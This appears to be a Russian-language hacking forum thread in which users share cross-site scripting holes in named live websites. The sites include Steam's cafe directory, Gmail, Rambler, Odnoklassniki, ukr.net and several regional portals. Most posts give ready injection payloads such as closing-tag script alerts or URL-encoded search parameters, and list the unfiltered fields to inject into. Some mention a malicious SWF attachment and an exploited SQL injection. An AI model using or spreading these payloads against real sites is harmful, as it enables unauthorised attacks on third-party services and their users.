Вот нашол свою первую XSS Онлайн игра azona.ru Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек) и вот XSS ЗЫ вроде туда запостил если нет переместите в нужный раздел
Екатеринбурский крупнейший портал города: www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS
пассивные http://noxak.ru/snak3_find.html , но на SMSline.Biz . там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона. Довольно-таки крупный поисковик. http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2Fscript%3E 14 алертов
Универсальный оператор связи. http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E
https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script> дерзайте сайт всемирный фирмы каторая держить кс! XSS нашол не я! ибо нашол на забугорных сайтах xss Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо....... Спасибо за внимание! (извените если не туда)
Meta.ua Активная XSS при открытии вложения, а именно злобного SWF-файла. Работает в Mozilla Firefox. Файл создавать так: http://forum.antichat.ru/showthread.php?t=65360 Проверил в Opera 9.52- тоже работает.
goroskop.bigmir.net Уязвимо поле "Имя" при составлении любого гороскопа, однако статическая страница с XSS-кодом выводится только в "Персональном гороскопе". Пример:
Gmail.com Та же самая ситуация с ядовитой флешкой. Работает в Opera 9.52 и в FF 3 (на второй ветке не проверял).
Rambler.ru И опять 25. Баги с гороскопами повторяются, на сей раз под скальпелем- Рамблер(движок гороскопов тот же, что и на Бигмире). "Персональный": Code: http://horoscopes.rambler.ru/personal/index.html#stage=payment&pid=89576&s=0590207 "Китайский 2008": Code: http://horoscopes.rambler.ru/chineseyear/#stage=payment&pid=89576&s=28749925
Ukr.net Украинская электронная почта №1 При заливке видео не фильтруется параметр "Ник": Code: http://play.ukr.net/auth/profile/id/449817/ Удалили уже... Code: http://play.ukr.net/auth/profile/id/449882/
одноклассники.ру Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... Code: http://wg3.odnoklassniki.ru/dk?st.cmd=altGroupMain&st.groupId=43219581272223&tkn=1446
В продолжение темы о социальных сетях... connect.ua "Мои фото" -> создаем альбом. Не фильтруются поля "Описание"(работает в списке альбомов) и "Название"(работает при входе в альбом, но тут надо приписать закрытый тег </title>). Code: [COLOR=Yellow][B]http://connect.ua/myphotos-272106[/B][/COLOR] "Аудио"- не фильтруются поля "Альбом" и "Исполнитель". Работает в "Моих записях" и на главной странице(!) профиля. Code: [COLOR=Yellow][B]http://connect.ua/user-272106[/B][/COLOR] Кто хочет поискать еще- дерзайте! Кто ищет, тот... выпьет обязательно!
TUT.UA- молодой, но довольно крупный проект. При регистрации называем себя именем: Code: "><script>alert()</script> Code: http://ligendo.photo.tut.ua/ + в списке новых пользователей: Code: http://photo.tut.ua/
